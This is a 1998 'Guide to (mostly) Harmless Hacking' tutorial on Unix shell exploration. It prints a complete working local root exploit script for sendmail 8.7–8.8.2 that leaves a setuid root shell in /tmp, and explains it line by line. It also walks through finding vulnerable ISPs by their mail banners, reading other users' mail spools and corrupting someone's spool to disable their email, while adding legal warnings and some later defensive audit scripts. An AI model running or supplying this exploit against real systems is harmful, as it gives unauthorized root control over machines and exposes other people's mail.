05/16/98


Guide to (mostly) Harmless Hacking

Vol. 5 Programmers' Series

No. 2: Shell Programming: an Exploit Explained, part 2



by Carolyn Meinel <cpm@rt66.com> and BOFH <blips@cryptotek.happyhacker.org>
(finger us for important security tips!)


HOW TO DISCOVER ALL AVAILABLE UNIX COMMANDS


Now that you have a login file that isn't lame, let's start exploring the
commands you can run from your tcsh shell account. Since you are reading
this because you wish to be a hacker, let's start by looking for a compiler
for the C language, the language most exploit programs are written in.


The best guess for a command to run the C compiler is the letter "C" (duh.)
So at your prompt give the command:


c<control d>


where you first type the letter "c", then hold down the "control" key while
hitting the letter "d". (Note: this also works in the C shell (csh). In bash
and other shells that use readline, type "c" and then press the Tab key
twice to get the same kind of list.)


This gives us a complete list of all the commands you can use that start
with the letter "c". It will look something like this:


c++ chroot compress.FCS
c2ph chrtbl config
cal chsh config.txt
calctool ci constype
calendar clear continue
cancel clear_colormap convert_to_Xdefaults
capitalize clear_functions convert_to_xview
case click convertfont
cat clock core
cb cm cpio
cc cm_delete cppstdin


(many more commands beginning with the letter c snipped)


That "cc" command looks promising. On your system the C compiler may have a
different name, most commonly "gcc" (the GNU compiler), so don't give up if
you don't see "cc". To be sure this is the C compiler, give the command
"man cc". This brings up the online manual page for the C compiler (the one
below is from a SunOS system; yours will differ in the details):


CC(1V) USER COMMANDS CC(1V)


NAME
cc - C compiler


SYNOPSIS
cc [ -a ] [ -align _block ] [ -Bbinding ] [ -c ] [ -C ]
[ -dalign ] [ -dryrun ] [ -Dname [=def ] ] [ -E ]
[ float_option ] [ -fsingle ] [ -g ] [ -go ] [ -help ]
[ -Ipathname ] [ -J ] [ -Ldirectory ] [ -M ]
[ -misalign ] [ -o outputfile ] [ -O[level] ]
[ -p ] [ -P ] [ -pg ] [ -pic ] [ -PIC ] [ -pipe ]
[ -Qoption prog opt ] [ -Qpath pathname ]
[ -Qproduce sourcetype ] [ -R ] [ -S ] [ -sb ]
[ -target target_arch ] [ -temp=directory ] [ -time ]
[ -Uname ] [ -w ] sourcefile ... [ -llibrary ]


SYSTEM V SYNOPSIS
/usr/5bin/cc arguments


/usr/xpg2bin/cc arguments


Note: arguments to /usr/5bin/cc and /usr/xpg2bin/cc are identical
to those listed above.


(snip)


DESCRIPTION
cc is the C compiler. It translates programs written in the C
programming language into executable load modules, or into relocatable
binary programs for subsequent loading with the ld(1) link editor.


In addition to the many options, cc accepts several types of filename
arguments. For instance, files with names ending in .c are taken to be C
source programs. They are compiled, and each resulting object program is
placed in the current directory. The object file is named after its source
file - the suffix .o replacing .c in the name of the object. In the same
way, files whose names end with .s are taken to be assembly source
programs. They are assembled, and produce .o files. Filenames ending in .il
are taken to be inline expansion code template files; these are
used to expand calls to selected routines in-line when optimization is
enabled. See FILES, below for a complete list of
compiler-related filename suffixes.


Other arguments refer to assembler or loader options, object programs,
or object libraries. Unless -c, -S, -E, -P or -Qproduce is specified,
these programs and libraries, together with the results of any
specified compilations or assemblies, are loaded (in the order given) to
produce an output file named a.out. You can specify a name for the
executable by using the -o option.


"Oh, no!" you shout/cry/whimper. "This stuff looks like it was written by
a gnome in some underground weapons complex in a James Bond movie!"
Patience, one of these days I'll get around to writing a simple explanation
of how to link, compile and run C programs. If you don't have patience, a
good book that covers C and includes a CD-ROM with programming tools is
"Unix Programming Tools," by Eric Foster-Johnson, M&T Books, 1997.


Or, if you are a real hacker, you will start trying out that C compiler
today! Guess what, if you make mistakes in trying to follow the on-line
manual, big deal. No one will make fun of you. You can't destroy your
computer with a C compiler mistake, either. (OK, maybe you could mess
something up, but what the heck.) Real hackers aren't afraid to make
mistakes and don't make fun of others who make mistakes, either. The essence
of hacking is to boldly try out new things and not be afraid of hitting the
wrong key.


Besides, I make lots and LOTS of mistakes and I [Carolyn] am a famous, er,
infamous hacker. If an old lady like me isn't afraid to make public
boo-boos, you can be brave and figure out that C compiler by yourself.


To learn about every single command that you have the power to run from
your shell account, type in the letter "a" followed by control d. Then with
each and every command that brings up, give the command "man acommand" where
you substitute the command you wish to explore for "acommand". Then try
using that command until you have figured out how to use it with all its
variations. Do this in turn with each of the rest of the letters of the
alphabet. When you are done, you will be a true Unix wizard. No one will
ever again say to you, "RTFM!" (Read the forking manual).


AN EXPLOIT EXPLAINED


Here's a fun, simple, powerful shell script. This is a goodie that you
might be able to use from your shell account to create a root shell for
yourself on the computer where you have your shell.



Newbie note: A "root shell" allows you to do anything you wish to the
computer you are on.




You can go to jail warning: In the US and many other countries, it is
illegal even to just get a root shell on someone else's computer -- unless
that person agrees to let you get root.



If you are determined to test this shell script, there are ways to do
this legally. Number one, install some form of Unix on your home computer.
The easiest to install is Red Hat Linux, available at
http://www.redhat.com.
The easiest to get exploits to run on is Debian Linux, at
http://www.debian.org. For other Linux sources, see the GTMHH "Linux!" at
http://www.happyhacker.org.


Make sure your Linux is running an outdated sendmail program, versions 8.7
through 8.8.2. Current distributions ship much newer releases, so you will
have to fetch an old sendmail 8.7 or 8.8.x source release and install it on
purpose; a stock sendmail will simply ignore this script.


Next set up user accounts on your home Linux box. The command is "adduser."


Then run this exploit from your user account on your home computer. If you
have the right version of sendmail, you will be amazed at how easy it is to
break in.


The other way to legally run this exploit is to get permission to break
into someone else's computer. Soon our Hacker Wargame will offer accounts
on a newbie computer that will allow this exploit.


Don't assume you can get away with running this script against a stranger's
computer. There is no way to be absolutely certain you won't get caught.
Besides, if you have to read this to learn how to break into a computer, you
don't know enough to have even a hope of getting away with the crime.


Once you try this exploit you will know how ridiculously easy it is to
break into computers. If someone gets busted for breaking into a computer
using this shell script, yeah, sure, the media will make out like the person
who ran it is a genius. But you are about to learn that a little kid could
break into a computer that runs a vulnerable version of sendmail. It's that
easy. So anyone who is in the know realizes that it doesn't take brains to
break into a computer. They will simply agree with Fatal Error that "To err
is human; to get caught is just plain stupid."


Here is how to break into a computer that runs sendmail 8.7 through 8.8.2
on the Linux and FreeBSD operating systems.


1) Look for an Internet service provider running a vulnerable version of
sendmail. To do this, get the domain names of some ISPs from
http://www.celestin.com/pocia. Another way to get ISP names is from people's
email addresses.


Then try telnetting to their SMTP (mail server) port, port 25, and read the
greeting line. (The addresses shown in these examples are deliberately
bogus.) Use the command:


telnet fubar.com smtp


Trying 208.999.37.180...
Connected to fubar.com (208.999.37.180).
Escape character is '^]'.
220 lobo.net ESMTP


Now there is a smart ISP. They don't tell strangers what mail server
program they run. But pretty soon you will hit an ISP that is vulnerable.
You will get a message like this:


telnet foominds.com smtp


Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.
220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700


OK, we have a vulnerable version of sendmail -- or at least a banner that
claims one. But is the operating system one the script is known to work on?
You can find that out by telnetting to the login port and looking at the
banner it prints:


telnet foominds.com


Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.



UNIX(r) System V Release 4.0 (zuni)


login:


We struck out here -- maybe. The script's author says it works on Linux and
FreeBSD running the vulnerable sendmail versions, and "may be other
platforms"; this ISP is running Sun's own build of sendmail on a System V
Release 4 system (Solaris), so it may or may not work there.
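Here is the banner check written so you can run it on a pasted greeting
instead of on somebody's live server. It is an added example, not code from
the original guide; the three banners are constructed samples, the SMI-8.7
one copied from above. One caveat the script cannot remove: a vendor build
such as "SMI-8.7" carries the vendor's own patches, and anyone can edit the
greeting text, so a banner only tells you where to look, never that a host
is vulnerable.

```shell
#!/bin/sh
# Added example: classify an SMTP greeting by the sendmail version it
# advertises.  Pure string handling, so it works on a pasted banner.

# Print the version number that follows "Sendmail" in a 220 greeting,
# or nothing if the greeting does not name sendmail at all.
sendmail_version_from_banner() {
    printf '%s\n' "$1" |
        sed -n 's/.*Sendmail[^0-9]*\([0-9][0-9.]*\).*/\1/p'
}

# Exit 0 if the version is in the 8.7 .. 8.8.2 range the script targets,
# 1 otherwise.  A missing minor or patch number counts as 0, so "8.8"
# is treated as 8.8.0.
sendmail_in_target_range() {
    ver=$1
    [ -n "$ver" ] || return 1
    major=${ver%%.*}
    rest=${ver#"$major"}; rest=${rest#.}
    minor=${rest%%.*}
    rest=${rest#"$minor"}; rest=${rest#.}
    patch=${rest%%.*}
    [ "$major" = 8 ] || return 1
    case ${minor:-0} in
        7) return 0 ;;
        8) [ "${patch:-0}" -le 2 ] && return 0 ;;
    esac
    return 1
}

# One line per banner: "no-sendmail", "target-range VER" or "other VER".
classify_banner() {
    ver=$(sendmail_version_from_banner "$1")
    if [ -z "$ver" ]; then
        echo no-sendmail
    elif sendmail_in_target_range "$ver"; then
        echo "target-range $ver"
    else
        echo "other $ver"
    fi
}

# Constructed sample greetings; the second is the one quoted above.
BANNER_SILENT='220 lobo.net ESMTP'
BANNER_SMI='220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700'
BANNER_NEWER='220 mail.example.net ESMTP Sendmail 8.8.5/8.8.5; Sun, 3 May 1998 14:43:07 -0700'

# Stand-alone run over the three samples.
for b in "$BANNER_SILENT" "$BANNER_SMI" "$BANNER_NEWER"; do
    printf '%-18s <- %s\n' "$(classify_banner "$b")" "$b"
done
```

The "silent" banner classifies as no-sendmail, which is exactly the
information the smart ISP above wanted to withhold: it may well be running
sendmail, you just cannot tell from the greeting.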


Let's say you find an ISP where this exploit is certain to work. Your next
step is to buy an account on this ISP.



You can go to jail warning: The way I am showing you to break into a
computer is GUARANTEED to get you caught. Don't do this unless you have
first gotten permission to try it out from the owner of your ISP. If you
discover your ISP is vulnerable, your best bet is not to break in. Instead,
politely tell tech support they are vulnerable, and offer to show them how
to break in. They might say "Yes, please show us how it's done"! Then it
will be OK to run this script.



Now comes the fun part. Give the command "pico s.sh" (or substitute your
favorite editor for "pico"). That brings up an editor program. Next, put in
the following shell commands:


#!/bin/sh
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
# leshka.c: start the setuid-root sendmail binary with argv[0] set to
# "/tmp/smtpd".  The basename "smtpd" makes sendmail run as a daemon,
# and a vulnerable sendmail re-executes whatever argv[0] names when it
# gets SIGHUP -- still as root.
echo '#include <unistd.h>'>>leshka.c
echo 'int main(void)'>>leshka.c
echo '{'>>leshka.c
echo '  execl("/usr/sbin/sendmail", "/tmp/smtpd", (char *)0);'>>leshka.c
echo '  return 1;'>>leshka.c
echo '}'>>leshka.c
#
# smtpd.c: what sendmail will exec as root.  It leaves a setuid-root
# copy of /bin/sh in /tmp.
echo '#include <unistd.h>'>>smtpd.c
echo '#include <stdlib.h>'>>smtpd.c
echo 'int main(void)'>>smtpd.c
echo '{'>>smtpd.c
echo '  setuid(0); setgid(0);'>>smtpd.c
echo '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");'>>smtpd.c
echo '  return 0;'>>smtpd.c
echo '}'>>smtpd.c
#
# Compile both (use gcc instead of cc if that is the compiler's name).
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
# Start sendmail under the name /tmp/smtpd, dig its PID out of ps, HUP it.
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type: /tmp/sh"


Now save it as s.sh. The "sh" at the end of the name is only a reminder to
you that it is a shell script. After saving it, make it executable by giving
the command "chmod 700 s.sh". That means only you can read or run this
program. If you want anyone on the system to be able to run it, give the
command "chmod 755 s.sh" (not 777, which would also let anyone edit it).


What does this cute little shell script do? It writes two tiny C programs,
"leshka.c" in your current directory and "smtpd.c", compiles them into
"leshka" and "/tmp/smtpd", runs leshka, sends the sendmail daemon that
results a HUP signal, erases the sources and both programs, then prompts
you to enter your brand new Unix shell, "/tmp/sh", inside of which you will
discover you are root (the superuser with control over the entire victim
computer).


Let's take this program apart so we understand how it does its thing.


1) It writes two C programs with echo commands. The heart of leshka.c is a
single call:
echo '  execl("/usr/sbin/sendmail", "/tmp/smtpd", (char *)0);'>>leshka.c
execl replaces the running program with /usr/sbin/sendmail, and the second
argument becomes sendmail's argv[0], the name a program believes it was
started under. Here that name is a lie: "/tmp/smtpd". The second program,
smtpd.c, is what you want sendmail to run for you as root: it calls
setuid(0) and setgid(0), then copies /bin/sh to /tmp/sh and turns on the
setuid and setgid bits with "chmod a=rsx", so anyone who runs /tmp/sh gets a
shell running as root.


2) Next the script compiles both c programs:


cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c


Note that you must know the command to run the C compiler on that computer.
If the C compiler command is "gcc", then substitute "gcc" for "cc" in this
line of the shell script.


You also must know the path to sendmail. Check it with the command "whereis
sendmail". If it has a different path than "/usr/sbin/sendmail," you must
substitute the correct path. While you are at it, confirm that sendmail is
setuid root: "ls -l /usr/sbin/sendmail" should show owner root and an "s" in
the owner's execute position, like "-r-sr-xr-x". Without that bit sendmail
never runs as root and the script cannot work.


3) Next this shell script runs the two programs. "./leshka" starts
/usr/sbin/sendmail, which is setuid root, with argv[0] set to "/tmp/smtpd".
Sendmail looks at the last part of that name: "smtpd" tells it to start as
a daemon, which it does as root, and versions 8.7 through 8.8.2 remember
argv[0] as the path to restart from. The next line finds that daemon's
process ID in the output of "ps -ax" (grep picks the line mentioning
/tmp/smtpd, "grep -v grep" drops the grep process itself, and the tr/head
pipeline keeps only the first number on the line) and sends it a HUP signal:


kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`


A vulnerable sendmail handles HUP by re-executing the program named in
argv[0] -- your /tmp/smtpd -- with root privileges, and that program drops
the setuid-root copy of /bin/sh in /tmp. Sendmail 8.8.3 and later no longer
re-execute an argv[0] they cannot trust, so against a fixed version nothing
happens.


4) It removes the source files and both compiled programs:


rm leshka.c leshka smtpd.c /tmp/smtpd


Calling that "erasing the evidence" is generous: /tmp/sh stays behind with
its setuid bit, the daemon logged its start through syslog, and your shell's
history file, if it keeps one, records the commands you typed.


5) Then it sends a message to the screen:


echo "Now type: /tmp/sh"


That reminds you to give the command /tmp/sh to get into your own private
root shell. Do it soon: the setuid copy sits in /tmp only until an
administrator or a /tmp cleanup job removes it, and the file itself is the
loudest possible sign that something happened. One caveat on a modern test
box: if /bin/sh is bash, it drops setuid privileges at startup, so run
"/tmp/sh -p" to keep them.
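Since the "erase the evidence" step leaves things behind, here is what the
clean-up (or the friend whose box you tested) should look for. This is an
added example, not part of Leshka's script or of the original guide. The
ps output inside it is constructed to look like the BSD "ps -ax" layout the
kill line relies on; the setuid search and the ownership check run against
real files.

```shell
#!/bin/sh
# Added example: what this exploit leaves behind, and how to spot it.
# The rm line in the script removes its sources and binaries but not
# /tmp/sh, and the daemon it HUP'd is visible in ps until it exits.

# List setuid or setgid regular files under a directory, sorted.
# Run it over /tmp, /var/tmp and home directories: nothing legitimate
# carries those bits there.
find_setuid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# True if the file is setuid and owned by root, which is what the
# exploit needs /usr/sbin/sendmail to be.  "test -u" is POSIX.
is_setuid_root() {
    [ -u "$1" ] && [ "$(ls -ld "$1" | awk '{print $3}')" = root ]
}

# Read "ps -ax"-style lines on stdin and print "PID COMMAND" for every
# process whose program lives under /tmp or /var/tmp.  The PID is the
# first numeric field, the same thing the kill -HUP pipeline digs out.
# Matching on the directory rather than on the name "smtpd" catches a
# copy that was renamed.
flag_tmp_processes() {
    awk '$1 ~ /^[0-9]+$/ {
             for (i = 2; i <= NF; i++)
                 if ($i ~ /^\/(var\/)?tmp\//) { print $1, $i; break }
         }'
}

# Constructed sample "ps -ax" output (not captured from a real machine).
SAMPLE_PS='  PID TT  STAT      TIME COMMAND
    1 ??  Is     0:00.01 /sbin/init
  312 ??  Ss     0:00.05 /usr/sbin/sendmail -bd -q30m
 4127 ??  S      0:00.00 /tmp/smtpd
 4130 p1  R+     0:00.00 ps -ax'

# Stand-alone run: report on the sample, then on the real /tmp.
printf '%s\n' "$SAMPLE_PS" | flag_tmp_processes
find_setuid_files /tmp
```

To use the process check on a live machine, pipe "ps -ax" into
flag_tmp_processes instead of the sample. The setuid search is the part
worth putting in a nightly cron job: a setuid file under /tmp is never
normal.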



You can get punched in the nose warning: When you are root it is really
easy to mess things up. Even if you have permission to be root, be careful!
If a friend gave you permission to break into his computer, just think how
he will feel if he has to reinstall his operating system because you hit a
wrong key or two!


This is a good reason not to break into a stranger's computer. You may think
you are quietly, harmlessly sneaking around, when, boom, you accidentally
trash things.



HOW TO EXPLORE A COMPUTER FROM INSIDE A SHELL ACCOUNT


What else can we do that is fun?


You can do a thorough exploration of everything that you are allowed to
access from your account with just four commands: "pwd", "cd", "ls" and
"cat". Sound too good to be true? I'll prove to you it's really this easy,
now!


Special bonus: if you just got root with that shell script above, you now
can totally explore your victim computer!


HOW TO READ EMAIL DIRECTLY FROM THE MAIL SPOOL


How about a nerdy Unix way to read your incoming email? (If you are root
you can read everyone's email this way. In the US, your ISP has the legal
right to read your email -- another reason to be friends, and not enemies,
of the tech support staff!) This is a real blast from the past, an example
of what life was like before email, when we old folks used to have to send
each other messages by simply transferring files.


First, let's find out where we are right now. For that you use the "pwd"
command. Your results may vary with this command, but if you give this
command right after logging in you will see your user name as part of the
current directory.


Now it's time to start moving around. Let's try out these commands to get
into the email directory. On most Unix systems you can do this with the
command:


->cd /var/spool/mail


If that doesn't work, try:


->cd /var/mail


Now -- can you resist? Since you are in /var/spool/mail, with the command
"ls" you can find out the user names of everyone who gets email here. If
you really wish to snoop, give the command ls -alF (or on some systems "ls
-alK") and you can even find out if anyone has world-readable email.



Newbie note: How do you figure out if someone's email is world readable?
"ls -alF /var/spool/mail/myusername" (substituting your user name for
"myusername") will give something that looks like this:


-rw------- 1 cpm 31217 May 3 16:14 /var/spool/mail/cpm


That's my mail. But if you see something like this:


-rw----r-- 1 cpm 31217 May 3 16:14 /var/spool/mail/cpm


That means anyone can read it. And if you see this:


-rw----rw- 1 cpm 31217 May 3 16:14 /var/spool/mail/cpm


That means anyone could alter my incoming email!



Here's an obnoxious trick. If someone were to put the wrong stuff in
someone's mail spool, it would disable their email reading programs so they
couldn't get their email until it got fixed. For example, my email programs
can be disabled by bringing the file /var/spool/mail/cpm up in an editor
program, putting the words "This is a test" at the top of the file, and
saving it.


If your mail spool should get messed up someday so that your email program
can't read it, you can straighten it out easily. First make a copy of the
file somewhere safe (for example "cp /var/spool/mail/myusername
~/mail.broken") so nothing is lost. Then give the command
"pico /var/spool/mail/myusername" (or whatever the path turns out to be for
your mail spool). Use the editor to first read and save any email you
want, then delete everything in that file! Leave it empty! That will get
rid of whatever the messed up stuff was.


If you can handle a problem like this by yourself, tech support will be
thankful that you don't call them crying about every little thing.


So let's suppose you use the "ls -alF" (or "ls -alK") command on the entire
mail spool at your ISP. If you do find that someone's email can be read by
anyone in the world, you need to make a decision. Do you want to make
friends and increase the likelihood that you will be able to get a great job
someday at your ISP? Then don't snoop! You can win points with tech
support if you point out the problem politely.


Make friends way: Email tech support with the message, "I was checking file
permissions on my email and noticed that user name JoeBlow has
world-readable mail."


Make enemies and get kicked off your ISP way: Email the victim user with the
message "You are owned!!! Muhahaha!!!"
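The "make friends" check as a script, added here as an example (it is not
from the original guide). other_access decodes the last three characters of
an ls -l mode string, the part that applies to everyone who is neither the
owner nor in the file's group; audit_spool_perms reports every file in a
spool directory that others can read or write; fix_spool_perms clears only
the "other" bits, leaving the group bits alone because on many systems the
local delivery agent appends to the spool through group "mail".

```shell
#!/bin/sh
# Added example: scripted version of the "make friends" check.

# Decode the last three characters of an ls -l mode string, the bits that
# apply to everybody who is not the owner and not in the file's group.
# Prints: none, readable, writable, or readable,writable.
other_access() {
    mode=$1
    other=${mode#???????}            # drop type, user and group columns
    other=${other%"${other#???}"}    # keep exactly three chars (ls may append + or .)
    case $other in
        rw?) echo readable,writable ;;
        r??) echo readable ;;
        ?w?) echo writable ;;
        *)   echo none ;;
    esac
}

# Print "world-writable NAME" or "world-readable NAME" for every regular
# file in the directory that others can touch.  Octal masks are the
# portable spelling for find: -004 = others may read, -002 = others may write.
audit_spool_perms() {
    {
        find "$1" -type f -perm -002 | sed 's|.*/|world-writable |'
        find "$1" -type f -perm -004 ! -perm -002 | sed 's|.*/|world-readable |'
    } | sort
}

# Repair: strip only the "other" bits.  Group bits are left alone because
# the local delivery agent on many systems appends to the spool through
# group "mail"; chmod 600 there would break delivery.
fix_spool_perms() {
    find "$1" -type f \( -perm -004 -o -perm -002 \) -exec chmod o-rwx {} +
}

# Stand-alone run over the real spool, report only (run fix_spool_perms
# yourself, on your own box).
for d in /var/spool/mail /var/mail; do
    if [ -d "$d" ]; then audit_spool_perms "$d"; fi
done
```

Note that the audit only lists files you are allowed to stat; on a spool
directory that is itself unreadable to you it prints nothing, which is the
right answer for that ISP.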


LIBRARY FUNCTIONS


Next let's use this ability to explore to do some more preparatory work for
your big day when you begin running C exploit programs. That exploit by
Leshka is unusually easy because it is a shell script that writes and
compiles its own tiny C programs. Most exploits are distributed as C source
that you must compile yourself, and that source calls functions from
libraries: the standard C library and often others (sockets, crypto,
terminal handling). The compiler needs the header files to compile such a
program, and the linker needs the library files to build the executable. If
a library is missing, the build stops with a linker error such as
"undefined reference" or "cannot find -lfoo"; then you have to find where
the library lives on your computer (and point the linker at that directory
with -L), or build it yourself and install it under your own account. (If
the tech support staff at your ISP is convinced you are a good guy, they
might even let you store your libraries in a public part of the system.
This keeps you from having to pay for extra file space in your account.)



Newbie note: A "library function" is not a party held in a library. It is a
ready-made routine, shipped in a library file, that does a commonly needed
job (open a socket, format a string, compute a hash) so that every program
does not have to carry its own copy. C programs that exploit security flaws
call plenty of them, and every library an exploit links against must exist
on the computer where you compile it, or it won't build. Math obsessives
and Fortran users please note that many C functions are not a "function" as
you are used to it being defined.



To see what library functions are on the computer you are using, first give
the command:


ls /usr/local/lib


If you are lucky you will see something like this:


aliaas.csh* libcom_err.a libmmalloc.a path.csh*
alias.csh* libcrypto.a libopcodes.a perl/
bison.hairy libdb.a libpty.a perl5/
bison.simple libdes425.a libreadline.a pgp/


(snip)


Anything with an asterisk after it is executable; the asterisk comes from
the -F option of ls (tcsh's built-in ls-F adds it too). A name ending in
".a" is a static library: an archive of compiled functions that the linker
copies into your program. A name ending in ".so" (often followed by a
version number) is a shared library, loaded when the program runs.


Where else might we find programs that can be included in programs you wish
to run? Let's try:


/usr/openwin/lib
/usr/local/X11/lib
/usr/X11/lib


There are other places where you might find good programs that are more
than just C library functions. Of course you will try "whereis games"!
Here are some other examples of directories with programs and library
functions you may be able to run:


->ls /usr/lib


c++rt0.o libftpio_p.a libopie.a
compat libg++.a libopie.so.2.0
crt0.o libg++.so.4.0 libopie_p.a
gcrt0.o libg++_p.a libpcap.a
kzhead.o libgcc.a libpcap.so.2.2
(snip)


Anything with the extension ".o" is a compiled object file (from C or
assembly) that the linker combines into programs; crt0.o, for instance, is
the startup code linked into every executable. The ".so" files are shared
libraries (the number after ".so" is the version), and names ending in
"_p.a" are profiling builds of the same static libraries.


Also, try /usr/local/bin:


Pnews* pager*
Rnmail* patch*
WebReport* patch-metamail*
a2p* perl*
(snip)


You can go on and on like this hunting for interesting stuff. If you know
the name of the program you are looking for, use "whereis" or "which"; to
search by name through a whole directory tree, use "find / -name
programname" and ignore the "Permission denied" messages for directories
you may not enter. Otherwise, browse: "cd .." and "cd /" move you upward
into unknown directory space, "ls" shows you what is below, "cd dirname"
moves you down into it, and whenever you wonder where you are, give the
command "pwd".
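To make the library hunt repeatable, here is a small set of shell functions
added as an example (not from the original guide). classify_libfile names
what a file in a lib directory is from its suffix; find_library looks for
lib<name>.a and lib<name>.so[.N] across the directories mentioned above, or
any list you pass; link_flags_for turns a path it found into the "-L dir
-l name" pair the compiler needs. The default directory list is taken from
the text; whether any of them exists on your box is an assumption the
function checks before looking.

```shell
#!/bin/sh
# Added example: find the library behind a "cannot find -lfoo" error.

# Say what a file in a lib directory is, from its suffix.
classify_libfile() {
    case $1 in
        *_p.a)       echo "profiled static archive" ;;
        *.a)         echo "static archive" ;;
        *.so|*.so.*) echo "shared library" ;;
        *.o)         echo "object file" ;;
        *)           echo "not a library file" ;;
    esac
}

# find_library NAME [DIRLIST]
# Print "<path>: <kind>" for every lib<NAME>.a, lib<NAME>.so or
# lib<NAME>.so.N found in the space-separated directory list
# (default: the directories the text mentions).
find_library() {
    name=$1
    dirs=${2:-"/lib /usr/lib /usr/local/lib /usr/X11/lib /usr/openwin/lib"}
    for d in $dirs; do
        [ -d "$d" ] || continue
        for f in "$d/lib$name.a" "$d/lib$name.so" "$d/lib$name".so.*; do
            [ -e "$f" ] && printf '%s: %s\n' "$f" "$(classify_libfile "$f")"
        done
    done
    return 0
}

# Turn a library path into the flags cc needs, e.g.
# /usr/local/lib/libcrypto.a -> "-L/usr/local/lib -lcrypto".
link_flags_for() {
    path=$1
    dir=${path%/*}
    base=${path##*/}
    base=${base#lib}
    base=${base%%.*}
    printf '%s\n' "-L$dir -l$base"
}

# Stand-alone run: where does this machine keep libcrypto, if anywhere?
find_library crypto
```

If find_library prints nothing for the library your exploit wants, the
library is not installed where the linker will look; build it under your
own account and pass its directory to cc with -L.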


CONCLUSION


Today's exercises will help you:
* get familiar with the computer where you have a shell account
* show you how easy programming can be
* reveal that breaking into computers is something even a little kid could do


To become a truly elite hacker, you need to be able to do far more than
merely break into computers. In fact, the hacker gods (people like Eric
Raymond, who is profiled in one of our Guides to (mostly) Harmless Hacking)
laugh at people who say they are hackers just because they can break into
computers. Remember, no one needs to understand Leshka's exploit to use it.
After doing today's lessons, you are already more advanced than many of the
"hackers" who break into computers. This is because you understand some
basics of how Leshka's shell script works, and have even written your own
login shell script.


So now you are already ahead of the average guy who calls himself a
"hacker." You don't believe me? At last year's Def Con V convention, a
real hacker ran a poll of people who claimed to be hackers. Over half had
never even heard of the "cat" command. You not only have heard of it -- you
use it all the time now. Right?


Happy hacking!


Where are those back issues of GTMHHs and Happy Hacker Digests? Check out
the official Happy Hacker Web page at
http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the
kind that led to the creation of the Internet and a new era of freedom of
information. So don't email us about any crimes you have committed!
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless
Hacking, please email
hacker@techbroker.com with message "subscribe
happy-hacker" in the body of your message.
Copyright 1998 Carolyn P. Meinel <cmeinel@techbroker.com> and BOFH. You may
forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your
Web site as long as you leave this notice at the end.




Carolyn Meinel
M/B Research -- The Technology Brokers
http://techbroker.com